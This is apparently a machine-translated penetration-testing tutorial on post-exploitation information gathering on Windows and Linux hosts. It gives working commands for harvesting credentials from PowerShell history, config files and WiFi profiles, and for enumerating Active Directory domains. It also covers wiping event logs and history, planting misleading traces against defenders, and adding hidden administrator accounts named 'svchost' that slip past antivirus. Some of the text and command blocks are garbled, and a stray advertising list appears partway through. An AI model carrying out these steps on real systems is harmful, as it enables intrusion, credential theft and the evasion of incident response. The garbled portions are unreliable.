preface

This article is only used for exchange and learning. Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article shall be borne by the user himself, and the author of this article shall not assume any responsibility.

Host Information Collection

Windows host information collection

History of Powershell commands

You can view this using Powershell

powershell Get-Content (Get-PSReadlineOption).HistorySavePath
Copy the code

In some cases, this command may not work. You can use dir to check the location of the powershell history command record file, and then use type to read it

%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
%appdata%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Copy the code

type C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Copy the code

1, 200 copies of many out-of-print e-books have not been bought 2, 30G security factory inside the video materials 3, 100 copies of SRC documents 4, common security comprehensive questions 5, CTF contest classic topic analysis 6, the full kit 7, emergency response notes 8, network security learning route

PS: When you encounter file download vulnerability in Windows environment, you can download the following files to browse sensitive information. Some o&M will use Powershell to manage workgroups or machines in the domain. If you are lucky, you can find SSH, database login passwords or other important files, especially some o&M scripts. Mostly consists of host, login password database, can find these scripts through powershell history of absolute path, then read in using the file download loopholes, this also is a great breakthrough, and most of these historical command contains links to host information, can be extracted in IP, broaden our attack surface.

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Copy the code

Those of you who are in a hurry to trace the source can also take a look at this file and maybe find some clues

At the end of infiltration, if you have used Powershell, you must clear the history records of Powershell commands, which can reduce the probability of success of tracing to a certain extent. Of course, you can also confuse the blue team and write some strange commands, such as changing the C2 address online to the overseas mining IP with public IOC information. To dig a hole and then throw in a few samples, misleading to stack for traceability consumption of energy, defending fake trace remember changes file time, still have to pay attention to the language these details, or blues’ see Chinese name, wrong grammar, and time to dig, combination of offensive and defensive drills, the first time will certainly know it is fake, If there is a traffic audit device such as IDS on the Intranet, the blue team can check the traffic of the device, which may expose us.

Clear the history of Powershell commands

powershell Remove-Item (Get-PSReadlineOption).HistorySavePath
Copy the code

View history open files

This directory contains the history of the computer opened file records, which files, when, including the click of several disks, are very detailed records, we can use this directory to locate the operation and maintenance of common folders, files, etc., to find sensitive information, check this directory is often a magic effect. Many times operations in order to facilitate management machine like used to record each machine code, the code small, after all, an operations management dozens of machines are very common, so much the password may not remember, so most of the operations will choose the machine code record in TXT, XLS this file, it also gives us an opportunity, In fact, what I encountered most in this directory were daily and weekly reports written by operation and maintenance. In most cases, these reports contained a large amount of server information, so we could further cross the Intranet through these sensitive information.

recent
Copy the code

Most of the time our starting point is webshell permissions, if you do not determine whether the administrator is online, whether there is a traffic detection device such as IDS, then in the first time it is best not to go to the remote, otherwise it is not worth the loss; In this case, we can use dir to read the history of the file, and then use the dir search keyword to get the absolute path of the file, so that we can directly view in the Webshell or download back to local open.

dir %APPDATA%\Microsoft\Windows\Recent
dir C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent
dir /a /s /b c:\password.txt
Copy the code

Other commonly used keyword searches,

dir /a /s /b c:\*.conf *.ini *.inc *.config 
dir /a /s /b c:\conf.* config.* 
dir /a /s /b c:\*.txt *.xls *.xlsx *.docx
findstr /s /i /n /d:C:\ /c:"pass" *.config
Copy the code

If too much content is displayed, you can search for these keywords one by one or use findstr to filter them, for example:

Dir/a/s/b c: \ *. * the conf. Ini *. Inc *. Config | findstr searches "operations" dir/a/s/b c: \ *. TXT *. XLS *. XLSX *. Docx | findstr searches "password"Copy the code

In addition, you can go to the recycle bin to flip over, and there will be a lot of surprises.

In the recent directory, files are uploaded to the target machine, such as NPS, MIMikatz, psexec, etc. In the recent directory, records are generated in order to better hide traces. We can run the RD command to delete the running record or directly use the file management function provided by CS or Webshell management tool to delete the record. In addition, after the successful login and exit of psexec, Event 4624, 4628 and 4634 will be generated in the security log of the target machine. Event 7045 (recording the PSEXESVC installation) and Event 7036 (recording the PSEXESVC service status) are generated in system logs. Windows logs also need to be processed. The recent directory is empty or has very few items in it if you do not manually clean it or use some security tools to clean it.

Rd/s fileCopy the code

Windows Log path:

Evtx Security log: %SystemRoot% System32 Winevt Logs Security.evtx application log: %SystemRoot% System32 Winevt Logs Security.evtx application log: %SystemRoot%\System32\Winevt\Logs\ application. evtx Logs in the registry key: HKEY_LOCAL_MACHINE\ System \CurrentControlSet\Services\Eventlog Default IIS log location: %SystemDrive% inetpub\logs\LogFiles\W3SVC1\Copy the code

Powershell clears Windows event logs

PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}"
Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname}
Copy the code

PS: If the uploaded file cannot be deleted (without permission or other factors), you can upload or create a new file with the same name to overwrite the original file.

Search for sensitive files

• Configuration files such as servers, middleware, and databases.
• Operation and maintenance of passwords, work records, personal records and so on.
• Company documents, contracts, network topology, that sort of thing.
• …

We all know the importance of configuration files such as server, middleware and database. If a configuration file containing a large amount of sensitive information is obtained during infiltration, it will pave the way for subsequent infiltration, as follows:

In a certain project, I got a shell on the Intranet and found that a certain configuration file, config-back. XML, contained a large number of database accounts and passwords through host information collection. Then I used CS to download the configuration file to the local, and set up an agent to use these accounts and passwords to launch MSSQL hosts in batches. Combining these passwords to produce high quality dictionary blasting C machine, took less than 30 minutes to more than 200 machine permissions, so penetration is the essence of information gathering, information gathering is decided by the findings of our penetration amount, about the configuration file find there is not much said, the dir command to find the above for reference.

dir /a /s /b d:\conf.* config.*
Copy the code

In addition to pay more attention to the web system itself to store files, before met an IBM system, there is a cloud disk function, turn the function module found after operations to establish folder, which contain a large amount of data, what the network topology, operational log, there is even a password, and is doing while waiting for the insurance penetration, distance to the ops machine, There are a lot of equipment lists on the desktop, as well as account passwords of various systems, and these XLSX forms are not encrypted, can be directly opened to view, some operation and maintenance for convenience, often very serious security risks, giving intruders a great opportunity.

Here I would like to add the point of WiFi password acquisition. When penetrating the Intranet, the more passwords obtained, the easier the road will be. In many cases, the passwords on the Intranet are common, even if not, most of the passwords are regular

Netsh wlan show profiles netsh wlan show profiles name="WiFi name "key=clear obtain all WiFi passwords through the for loop for /f skip=9 tokens=1,2  delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clearCopy the code

If you already have administrator rights for your current machine, you can run credential retrieval tools such as Mimikatz and Procdump to obtain system credentials, since most administrators may use the same or regular password to manage multiple servers. If you can get the host password or hash, you can try PTH or psexec batch launch; And when she is in the process of collecting more pay attention to whether there is domain to enable the process, if just the domain administrator login we have permission to machine, you can use domain for horizontal pipe process, if not can watch ms14068, domain to this sort of thing, infiltration after all of these are basic common sense, there is not much more.

Common commands for collecting domain information

Common commands

Net use Viewing IPC connections. Net user /domain Obtaining the domain user list. Net user test 123 /add Adding a user neet LocalGroup Administrators test /add Add the test user to the management group. Net group /domain Query the groups in the domain. Net group "domain Admins "/domain Obtain the domain administrator list. Net group "enterprise Admins" /domain View enterprise administrator groups in the current domain user NET Group "domain Computers "/domain View the names of all computers in the current domain. Net Group" Exchange Servers "/domain Net Config workstation Check whether there are Exchange Net Groups "domain controllers" /domain Check whether there are domain controllers. Net Config workstation Check the current login domain. Net View Check the list of machines in the same domain Net view \ IP View the IP share. Net view \test View the list of shared resources on the test computer. Net view /domain View the number of domains on the Intranet Sid setspn -t target.com -q */* for /l % I in (1,1,255) do @ping 192.168.0. % 1 - I - w n 1 | find/I "TTL" for/l % I in (1,1,255) do @ ping 10.10.10. % 1 - I - w n 1 | find/I "TTL"Copy the code

Network information search

Ipconfig /all Displays information such as the host name, IP address, and DNS of the current host. Route print Displays information about the routing table. Netstat -ano Displays information about the port openingCopy the code

When looking for the internal network segment, it is recommended to search passively and actively. If the movement is too large, such as NMAP and NBTSCAN, the existing machines in the whole network segment may come out with a sweep, but then comes the traffic audit of IDS. Once traffic anomalies are detected by the blue team, it may lead to the loss of our permission. And it’s a blue team with all kinds of security equipment, Intranet penetration must be careful, large-scale asset scanning, automated vulnerability scanning I usually save for last.

Positioning the domain control

View the domain time. Generally, the domain controller functions as the time server

net time /domain
Copy the code

Locate a domain controller using the DNS

Ipconfig /allipconfig /displaydns Sometimes the domain controller information can be obtained from the DNS cacheCopy the code

Use NetDOM to obtain the domain controller list and obtain the domain controller name. You can ping the domain controller IP address

netdom query dc
Copy the code

Other Information Search

Systeminfo Views the patch status. Net group "domain controllers" /domain query domain controller nslookup -type=SRV _ldap._tcp.corp Obtains the DOMAIN controller address NLtest from the SRV record /dclist:corp Use nltest to query the domain controller list taskList/SVC to check the process and the corresponding service name cmdkey /l To check the saved login credentials. Type C :\Windows\ System32 \drivers\etc\hosts You can discover some Intranet IP addressesCopy the code

Other supplementary

Web log

Some old systems use get+ plaintext to transmit the background login account and password. We can check the web logs for possible harvest. In addition, we should pay attention to the logs of the system itself, which mostly contain Intranet IP segment and even account and password.

In addition, you can find FTP, many times the Intranet FTP can be unauthorized access, even if there is a password, most are weak password or regular, universal password, whether can be successfully logged in depends on the depth of our information collection, FTP mostly contains department or company sensitive files, can pay more attention to.

Use net1.exe to bypass the kill software to add users

Windows environment penetration add users are often blocked by AV, but also generate alarm logs, this time can use net1.exe bypass kill soft add users, of course, also can use CS own argue parameter pollution for user add.

net1.exe

cd c:/windows/system32
copy net1.exe svchost.txt
svchost.txt user svchost  M@Bas#as#@123 /add
net localgroup administrators svchost /add
svchost.txt user svchost  M@Bas#as#@123 /add & net localgroup administrators svchost /add
Copy the code

Argue parameter pollution

net1 argue net1 aaaaaaaaaaaaaaaaaaaaaaaassssssssssssssssssssssssssssssssssssssssssssssssss
execute net1 user svchost M@Bas#as#@123 /add
execute net1 localgroup administrators svchost /add
Copy the code

Normal net add users will be blocked by tinder

Delete user tinder also no perception

Add a user to the administrator group

m1kh.txt user m1kh  M@Bas#as#@123 /add & net localgroup administrators m1kh /add
Copy the code

Linux host information collection

Network Information Collection

Last Most o&M devices access the Intranet and log in to the system. In this case, some Intranet IP addresses can be obtained and the Intranet IP address segment can be mapped Ifconfig -a/ arp-a /netstat -anopt/ ss-nt IPtables provides certain information about the Intranet network topology. The IPtables firewall sometimes has Intranet traffic rules and provides certain information....Copy the code

Collection of Sensitive Documents

grep "password:" * -Rn
find / -name "config.*"
find / -name "databases.*"
find / -name "config.*" | xargs grep "password""
Copy the code

Other supplementary

• history

History is very useful for Linux penetration, all kinds of connection passwords, SSH, mysql, FTP, etc., should look at this file before obtaining permissions

• The database

After database access, in addition to collect account password, also can search log, login record these and see if there is any other IP network assets, encountered a number of sites share a mysql database, and then record in the background of multiple system account password, we can use these holes mining account password to log in other systems, Encounter background file upload, RCE these may also be able to line a host, more than a Intranet stronghold.

• The log

We need to pay more attention to the log, collect the account password for the subsequent penetration will be helpful, of course, most of the time we need webshell permission to view the log, at this time we can scan the directory to find the log. Or in conjunction with Spring Boot HttpTrace.

Talk about the log record in the database, some databases have log recording function, will record the USER login IP, after taking down the database permission, you can find these things, maybe you can get another Intranet IP segment, increase our horizontal attack surface.

The rest are SSH private keys and operation and maintenance scripts. Ultimately, information collection depends on the target scenario.

summary

Above are just some personal opinion, is partial, incomplete, I think need to improvise, day after day in the same way to solve the same problem, thinking will become ossified, this will lead to become no longer look carefully when we penetrate and careful thinking, with rigid thinking to do tend to make us miss the good opportunity, In the process of attack and defense in addition to the need to maintain a good mentality and clear thinking, but also to keep thinking to avoid mistakes.